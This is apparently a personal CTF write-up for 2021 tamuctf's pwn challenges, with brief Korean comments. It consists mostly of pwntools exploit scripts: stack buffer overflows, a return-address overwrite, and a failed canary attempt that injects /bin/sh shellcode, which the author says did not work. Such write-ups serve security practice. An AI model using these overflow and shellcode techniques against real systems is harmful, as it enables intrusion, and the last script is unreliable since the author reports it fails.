2021 tamuctf Writeup

PWN

warmup

from pwn import *

p = remote('194.5.207.56',7000)

payload = "A"*80

p.sendlineafter('name:', payload)

p.interactive()

 

Babypwn

from pwn import *

p = remote('194.5.207.56',7010)
wow = 0x4012ec
payload = b""
p.sendlineafter('name: ', b"A"*0x1c+p64(0xcafe))

payload += b"B"*128
payload += b"C"*8
payload += p64(wow)

p.sendlineafter(b';;)', payload)
p.interactive()

canary(이건 못품)

작성했던 코드

from pwn import *

p = process('./canary')
e = ELF('./canary')

gdb.attach(p)
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p.sendlineafter('chars): ', shellcode)
p.sendlineafter('chars): ', "A"*16)

p.recvuntil('address: ')
canary = int(p.recvuntil('\n')[:-1], 16)
shell = canary + 0xc
payload = b"B"*0x14
payload += p64(shell)
p.sendlineafter('number: ', payload)
raw_input()
p.interactive()

 

왜 여기서 오류가 떴는지 모르겠다